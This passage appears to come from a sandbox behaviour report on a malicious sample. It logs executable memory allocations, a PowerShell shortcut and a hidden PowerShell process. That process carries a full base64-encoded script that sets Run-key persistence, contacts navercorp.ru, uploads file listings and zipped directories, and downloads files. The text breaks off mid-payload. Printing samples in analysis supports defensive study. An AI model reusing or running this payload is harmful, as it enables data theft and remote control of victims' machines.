NtAllocateVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00035000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00170000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00023000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00036000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00123000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 10:28 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff0002a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (4 events)

cmdline	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -ep bypass -ec UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANgA4ADsAJABWAHMAVgBtAGEARABqACAAPQAgADEAMAAyADQAIAAqACAAMQAwADIANAA7ACQAeAB3AGIAcAB5AG0AZABVAFcATgBzACAAPQAgACQAZQBuAHYAOgBDAE8ATQBQAFUAVABFAFIATgBBAE0ARQAgACsAIAAnAC0AJwAgACsAIAAkAGUAbgB2ADoAVQBTAEUAUgBOAEEATQBFADsAJABIAFoAZwBxAGYAQgBLAFgAIAA9ACAAJwBoAHQAdABwADoALwAvAG4AYQB2AGUAcgBjAG8AcgBwAC4AcgB1AC8AZABhAHMAaABiAG8AYQByAGQALwBpAG0AYQBnAGUALwAyADAAMgAzADAAMgAvAGMAbwBtAC4AcABoAHAAJwAgACsAIAAnAD8AVQA9ACcAIAArACAAJAB4AHcAYgBwAHkAbQBkAFUAVwBOAHMAOwAkAGEAVgBOAHgAYQBkAEMAeABtAHQARQBRAEYAYQAgAD0AIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAagBYAFMAaABBAGUAZwBNAEUAVwBNAHcAJwA7AGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABhAFYATgB4AGEAZABDAHgAbQB0AEUAUQBGAGEAKQApACAAewBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIAAtAE4AYQBtAGUAIABmAEcAWgB0AE0AIAAtAFYAYQBsAHUAZQAgACcAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHMAeQBzAHQAZQBtADMAMgBcAGMAbQBkAC4AZQB4AGUAIAAvAGMAIABQAG8AdwBlAHIAUwBoAGUAbABsAC4AZQB4AGUAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBOAG8ATABvAGcAbwAgAC0ATgBvAG4ASQBuAHQAZQByAGEAYwB0AGkAdgBlACAALQBlAHAAIABiAHkAcABhAHMAcwAgAHAAaQBuAGcAIAAtAG4AIAAxACAALQB3ACAAMwA5ADEANwA2ADMAIAAyAC4AMgAuADIALgAyACAAfAB8ACAAbQBzAGgAdABhACAAaAB0AHQAcAA6AC8ALwBuAGEAdgBlAHIAYwBvAHIAcAAuAHIAdQAvAGQAYQBzAGgAYgBvAGEAcgBkAC8AaQBtAGEAZwBlAC8AMgAwADIAMwAwADIALwA0AC4AaAB0AG0AbAAnACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUAOwB9AGYAdQBuAGMAdABpAG8AbgAgAFgAYQBOAHMAWQBKAGIAWABqAFQAbgAoACQAQwB6AHIASAAsACAAJABqAGQAVwBWACkAewAkAEkASgBiAE4AZwBwAFIAZwBVAEwARQBUAEQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAagBkAFcAVgApADsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcABXAGUAYgBSAGUAcQB1AGUAcwB0AF0AIAAkAFYAZgB0AFkAWgBIACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAkAEMAegByAEgAKQA7ACQAVgBmAHQAWQBaAEgALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwA7ACQAVgBmAHQAWQBaAEgALgBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAA9ACAAJwBhAHAAcABsAGkAYwBhAHQAaQBvAG4ALwB4AC0AdwB3AHcALQBmAG8AcgBtAC0AdQByAGwAZQBuAGMAbwBkAGUAZAAnADsAJABWAGYAdABZAFoASAAuAEMAbwBuAHQAZQBuAHQATABlAG4AZwB0AGgAIAA9ACAAJABJAEoAYgBOAGcAcABSAGcAVQBMAEUAVABEAC4ATABlAG4AZwB0AGgAOwAkAGEAVgBOAHgAYQBkAEMAeABtAHQARQBRAEYAYQBVACAAPQAgACQAVgBmAHQAWQBaAEgALgBHAGUAdABSAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtACgAKQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUALgBXAHIAaQB0AGUAKAAkAEkASgBiAE4AZwBwAFIAZwBVAEwARQBUAEQALAAgADAALAAgACQASQBKAGIATgBnAHAAUgBnAFUATABFAFQARAAuAEwAZQBuAGcAdABoACkAOwAkAGEAVgBOAHgAYQBkAEMAeABtAHQARQBRAEYAYQBVAC4ARgBsAHUAcwBoACgAKQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUALgBDAGwAbwBzAGUAKAApADsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcABXAGUAYgBSAGUAcwBwAG8AbgBzAGUAXQAgACQAUgBLAGMAbAAgAD0AIAAkAFYAZgB0AFkAWgBIAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQA7ACQARAB5AGMARAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoACQAUgBLAGMAbAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkAKQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUATABUACAAPQAgACQARAB5AGMARAAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AHIAZQB0AHUAcgBuACAAJABhAFYATgB4AGEAZABDAHgAbQB0AEUAUQBGAGEAVQBMAFQAOwB9AGYAdQBuAGMAdABpAG8AbgAgAEQAagBVAHUAaQAoACQAQwB6AHIASAAsACAAJAB2AFAARQBhAHYAUgBPAGoAdgBuACwAIAAkAHQAdQBwACwAIAAkAGIAQgBxAGwAVgApAHsAJABUAGkAbQBlAG8AdQB0AD0AMQAwADAAMAAwADAAMAAwADsAJABDAFIATABGACAAPQAgAFsAcwB0AHIAaQBuAGcAXQAkACgAWwBjAGgAYQByAF0AMAB4ADAARAApACAAKwAgAFsAcwB0AHIAaQBuAGcAXQAkACgAWwBjAGgAYQByAF0AMAB4ADAAQQApADsAJABUAHcAbwBIAHkAcABoAGUAbgBzACAAPQAgACcALQAtACcAOwAkAEIAbwB1AG4AZABhAHIAeQAgAD0AIAAnACoAKgAqACoAKgAnADsAJABzAHQAcgBlAGEAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBPAHAAZQBuAFIAZQBhAGQAKAAkAHYAUABFAGEAdgBSAE8AagB2AG4AKQA7ACQATAByAEIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAGIAeQB0AGUAWwBdACAAJABWAHMAVgBtAGEARABqADsAdwBoAGkAbABlACgAIAAkAGIAeQB0AGUAcwBSAGUAYQBkACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABMAHIAQgAsADAALAAkAFYAcwBWAG0AYQBEAGoAKQApAHsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcABXAGUAYgBSAGUAcQB1AGUAcwB0AF0AIAAkAFYAZgB0AFkAWgBIACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAkAEMAegByAEgAKQA7ACQAVgBmAHQAWQBaAEgALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwA7ACQAVgBmAHQAWQBaAEgALgBUAGkAbQBlAG8AdQB0ACAAPQAgACQAVABpAG0AZQBvAHUAdAA7ACQAVgBmAHQAWQBaAEgALgBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAA9ACAAJwBtAHUAbAB0AGkAcABhAHIAdAAvAGYAbwByAG0ALQBkAGEAdABhADsAYgBvAHUAbgBkAGEAcgB5AD0AJwAgACsAIAAkAEIAbwB1AG4AZABhAHIAeQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUAIAA9ACAAJABWAGYAdABZAFoASAAuAEcAZQB0AFIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AKAApADsAJABoAGUAYQBkAGkAbgBnADEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAVAB3AG8ASAB5AHAAaABlAG4AcwAgACsAIAAkAEIAbwB1AG4AZABhAHIAeQAgACsAIAAkAEMAUgBMAEYAKQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUALgBXAHIAaQB0AGUAKAAkAGgAZQBhAGQAaQBuAGcAMQAsACAAMAAsACAAJABoAGUAYQBkAGkAbgBnADEALgBMAGUAbgBnAHQAaAApADsAJABoAGUAYQBkAGkAbgBnADIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAQwBvAG4AdABlAG4AdAAtAEQAaQBzAHAAbwBzAGkAdABpAG8AbgA6ACAAZgBvAHIAbQAtAGQAYQB0AGEAOwAgAG4AYQBtAGUAPQAnACAAKwAgAFsAcwB0AHIAaQBuAGcAXQAkACgAWwBjAGgAYQByAF0AMAB4ADIAMgApACAAKwAgACQAdAB1AHAAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJwA7AGYAaQBsAGUAbgBhAG0AZQA9ACcAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJABiAEIAcQBsAFYAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJABDAFIATABGACkAOwAkAGEAVgBOAHgAYQBkAEMAeABtAHQARQBRAEYAYQBVAC4AVwByAGkAdABlACgAJABoAGUAYQBkAGkAbgBnADIALAAgADAALAAgACQAaABlAGEAZABpAG4AZwAyAC4ATABlAG4AZwB0AGgAKQA7ACQAaABlAGEAZABpAG4AZwAzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAEMAUgBMAEYAKQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUALgBXAHIAaQB0AGUAKAAkAGgAZQBhAGQAaQBuAGcAMwAsACAAMAAsACAAJABoAGUAYQBkAGkAbgBnADMALgBMAGUAbgBnAHQAaAApADsAJABhAFYATgB4AGEAZABDAHgAbQB0AEUAUQBGAGEAVQAuAFcAcgBpAHQAZQAoACQATAByAEIALAAgADAALAAgACQAYgB5AHQAZQBzAFIAZQBhAGQAKQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUALgBXAHIAaQB0AGUAKAAkAGgAZQBhAGQAaQBuAGcAMwAsACAAMAAsACAAJABoAGUAYQBkAGkAbgBnADMALgBMAGUAbgBnAHQAaAApADsAJABoAGUAYQBkAGkAbgBnADQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAVAB3AG8ASAB5AHAAaABlAG4AcwAgACsAIAAkAEIAbwB1AG4AZABhAHIAeQAgACsAIAAkAFQAdwBvAEgAeQBwAGgAZQBuAHMAIAArACAAJABDAFIATABGACkAOwAkAGEAVgBOAHgAYQBkAEMAeABtAHQARQBRAEYAYQBVAC4AVwByAGkAdABlACgAJABoAGUAYQBkAGkAbgBnADQALAAgADAALAAgACQAaABlAGEAZABpAG4AZwA0AC4ATABlAG4AZwB0AGgAKQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUALgBGAGwAdQBzAGgAKAApADsAJABhAFYATgB4AGEAZABDAHgAbQB0AEUAUQBGAGEAVQAuAEMAbABvAHMAZQAoACkAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBzAHAAbwBuAHMAZQBdACAAJABSAEsAYwBsACAAPQAgACQAVgBmAHQAWQBaAEgALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApADsAJABEAHkAYwBEACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAJABSAEsAYwBsAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQApADsAJABhAFYATgB4AGEAZABDAHgAbQB0AEUAUQBGAGEAVQBMAFQAIAA9ACAAJABEAHkAYwBEAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQAkAHMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQA7AH0AZgB1AG4AYwB0AGkAbwBuACAARABNAEUASABzAFEASwBWAFUAaAAoACQAQwB6AHIASAAsACAAJAB2AFAARQBhAHYAUgBPAGoAdgBuACkAewBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQAgACQAUgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJABDAHoAcgBIACkAOwAkAFIAZQBxAHUAZQBzAHQALgBzAGUAdABfAFQAaQBtAGUAbwB1AHQAKAAxADUAMAAwADAAKQA7ACQAUgBlAHMAcABvAG4AcwBlACAAPQAgACQAUgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkAOwAkAFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAgAD0AIAAkAFIAZQBzAHAAbwBuAHMAZQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkAOwAkAFMAcABsAGkAdABTAGkAegBlACAAPQAgADEAMAAyADQAOwAkAEIAdQBmAGYAZQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAEIAeQB0AGUAWwBdACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACQAUwBwAGwAaQB0AFMAaQB6AGUAOwBUAHIAeQAgAHsARABvACAAewAkAEMAbwB1AG4AdAAgAD0AIAAkAFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAEIAdQBmAGYAZQByACwAIAAwACwAIAAkAFMAcABsAGkAdABTAGkAegBlACkAOwAkAG8AZgBmAHMAZQB0ACAAPQAgACQAQwBvAHUAbgB0ACAALQAgADEAOwBBAGQAZAAtAEMAbwBuAHQAZQBuAHQAIAAkAHYAUABFAGEAdgBSAE8AagB2AG4AIAAkAEIAdQBmAGYAZQByAFsAMAAuAC4AJABvAGYAZgBzAGUAdABdACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlADsAfQAgAFUAbgB0AGkAbAAoACQAQwBvAHUAbgB0ACAALQBlAHEAIAAwACkAfQAgAEMAYQB0AGMAaAAgAHsAfQAgAEYAaQBuAGEAbABsAHkAIAB7ACQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtAC4ARABpAHMAcABvAHMAZQAoACkAOwB9AH0AZABvAHsAVAByAHkAewAkAGUAVgBqAFYATwBHAEkASwBNAEQAVQBDACAAPQAgAFgAYQBOAHMAWQBKAGIAWABqAFQAbgAgACQASABaAGcAcQBmAEIASwBYACAAJwAnADsASQBmACAAKAAkAGUAVgBqAFYATwBHAEkASwBNAEQAVQBDACAALQBuAGUAIAAnAG4AdQBsAGwAJwAgAC0AYQBuAGQAIAAkAGUAVgBqAFYATwBHAEkASwBNAEQAVQBDACAALQBuAGUAIAAnACcAKQB7ACQAZQBWAGoAVgBPAEcASQBLAE0ARABVAEMAPQAkAGUAVgBqAFYATwBHAEkASwBNAEQAVQBDAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAAxACwAIAAkAGUAVgBqAFYATwBHAEkASwBNAEQAVQBDAC4ATABlAG4AZwB0AGgAIAAtACAAMgApADsAJABjAGkAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAFYAagBWAE8ARwBJAEsATQBEAFUAQwApACkAOwBpAGYAIAAoACQAYwBpAGUAKQB7AGkAZgAgACgAJABjAGkAZQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAZgBpAGwAZQBpAG4AZgBvADoAJwApACkAewAkAE0AZQBqAFgAQwA9ACQAYwBpAGUALgBTAHUAYgBTAHQAcgBpAG4AZwAoADkAKQA7AGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAE0AZQBqAFgAQwApAHsAJABmAGkAbABlAG4AYQBtAGUAIAA9ACAAJABhAFYATgB4AGEAZABDAHgAbQB0AEUAUQBGAGEAIAArACAAJwAuAGMAcwB2ACcAOwBHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAJABNAGUAagBYAEMAIAAtAEYAaQBsAHQAZQByACAAKgAuACoAIAAtAFIAZQBjAHUAcgBzAGUAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAE4AYQBtAGUALAAgAEwAZQBuAGcAdABoACwAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACwAIABGAHUAbABsAG4AYQBtAGUAIAB8ACAARQB4AHAAbwByAHQALQBDAHMAdgAgAC0AUABhAHQAaAAgACQAZgBpAGwAZQBuAGEAbQBlACAALQBGAG8AcgBjAGUAIAAtAE4AbwBUAHkAcABlAEkAbgBmAG8AcgBtAGEAdABpAG8AbgAgAC0ARQBuAGMAbwBkAGkAbgBnACAAdQB0AGYAOAA7ACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAA9ACAAJwBfAGYAaQBsAGUAJwA7ACQAbgBvAHcAdABpAG0AZQAgAD0AIABHAGUAdAAtAEQAYQB0AGUAIAAtAEYAbwByAG0AYQB0ACAAeQB5AHkAeQAtAE0ATQAtAGQAZABfAEgASABfAG0AbQBfAHMAcwA7ACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAGYAaQBsAGUAbgBhAG0AZQAgAD0AIAAkAG4AbwB3AHQAaQBtAGUAIAArACAAJwBfAGYAaQBsAGUAaQBuAGYAbwAnADsARABqAFUAdQBpACAAJABIAFoAZwBxAGYAQgBLAFgAIAAkAGYAaQBsAGUAbgBhAG0AZQAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGYAaQBsAGUAbgBhAG0AZQA7AH0AfQBpAGYAIAAoACQAYwBpAGUALgBDAG8AbgB0AGEAaQBuAHMAKAAnAGQAaQByADoAJwApACkAewAkAE0AZQBqAFgAQwA9ACQAYwBpAGUALgBTAHUAYgBTAHQAcgBpAG4AZwAoADQAKQA7AGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAE0AZQBqAFgAQwApAHsAJABmAGkAbABlAG4AYQBtAGUAIAA9ACAAJABhAFYATgB4AGEAZABDAHgAbQB0AEUAUQBGAGEAIAArACAAJwAuAHoAaQBwACcAOwBDAG8AbQBwAHIAZQBzAHMALQBBAHIAYwBoAGkAdgBlACAAJABNAGUAagBYAEMAIAAkAGYAaQBsAGUAbgBhAG0AZQAgAC0ARgBvAHIAYwBlADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AbgBhAG0AZQAgAD0AIAAnAF8AZgBpAGwAZQAnADsAJABuAG8AdwB0AGkAbQBlACAAPQAgAEcAZQB0AC0ARABhAHQAZQAgAC0ARgBvAHIAbQBhAHQAIAB5AHkAeQB5AC0ATQBNAC0AZABkAF8ASABIAF8AbQBtAF8AcwBzADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAbgBvAHcAdABpAG0AZQAgACsAIAAnAF8AZABpAHIAJwA7AEQAagBVAHUAaQAgACQASABaAGcAcQBmAEIASwBYACAAJABmAGkAbABlAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBuAGEAbQBlACAAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AZgBpAGwAZQBuAGEAbQBlADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABmAGkAbABlAG4AYQBtAGUAOwB9AH0AaQBmACAAKAAkAGMAaQBlAC4AQwBvAG4AdABhAGkAbgBzACgAJwBmAGkAbABlADoAJwApACkAewAkAE0AZQBqAFgAQwA9ACQAYwBpAGUALgBTAHUAYgBTAHQAcgBpAG4AZwAoADUAKQA7AGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAE0AZQBqAFgAQwApAHsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AbgBhAG0AZQAgAD0AIAAnAF8AZgBpAGwAZQAnADsAJABuAG8AdwB0AGkAbQBlACAAPQAgAEcAZQB0AC0ARABhAHQAZQAgAC0ARgBvAHIAbQBhAHQAIAB5AHkAeQB5AC0ATQBNAC0AZABkAF8ASABIAF8AbQBtAF8AcwBzADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAbgBvAHcAdABpAG0AZQAgACsAIAAnAF8AZgBpAGwAZQAnADsARABqAFUAdQBpACAAJABIAFoAZwBxAGYAQgBLAFgAIAAkAE0AZQBqAFgAQwAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAOwB9AH0AaQBmACAAKAAkAGMAaQBlAC4AQwBvAG4AdABhAGkAbgBzACgAJwBkAG8AdwBuADoAJwApACkAewAkAE0AZQBqAFgAQwA9ACQAYwBpAGUALgBTAHUAYgBTAHQAcgBpAG4AZwAoADUAKQA7ACQAQwBoAGEAcgBBAHIAcgBhAHkAIAA9ACQATQBlAGoAWABDAC4AUwBwAGwAaQB0ACgAJwB8AHwAJwApADsAaQBmACAAKAAkAEMAaABhAHIAQQByAHIAYQB5AC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgADMAKQB7AEQATQBFAEgAcwBRAEsAVgBVAGgAIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMABdACAAJABDAGgAYQByAEEAcgByAGEAeQBbADIAXQA7ACQAcwBFAEsAYwBEAFgAcgBZAGEASQBWAHcAZgAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AFgAYQBOAHMAWQBKAGIAWABqAFQAbgAgACQASABaAGcAcQBmAEIASwBYACAAJABzAEUASwBjAEQAWAByAFkAYQBJAFYAdwBmADsAfQB9AGkAZgAgACgAJABjAGkAZQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAcgBlAGcAZQBkAGkAdAA6ACcAKQApAHsAJABNAGUAagBYAEMAPQAkAGMAaQBlAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA4ACkAOwAkAEMAaABhAHIAQQByAHIAYQB5ACAAPQAkAE0AZQBqAFgAQwAuAFMAcABsAGkAdAAoACcAfAB8ACcAKQA7AGkAZgAgACgAJABDAGgAYQByAEEAcgByAGEAeQAuAEwAZQBuAGcAdABoACAALQBlAHEAIAA1ACkAewBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABDAGgAYQByAEEAcgByAGEAeQBbADAAXQAgAC0ATgBhAG0AZQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAyAF0AIAAtAFYAYQBsAHUAZQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwA0AF0AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQA7ACQAcwBFAEsAYwB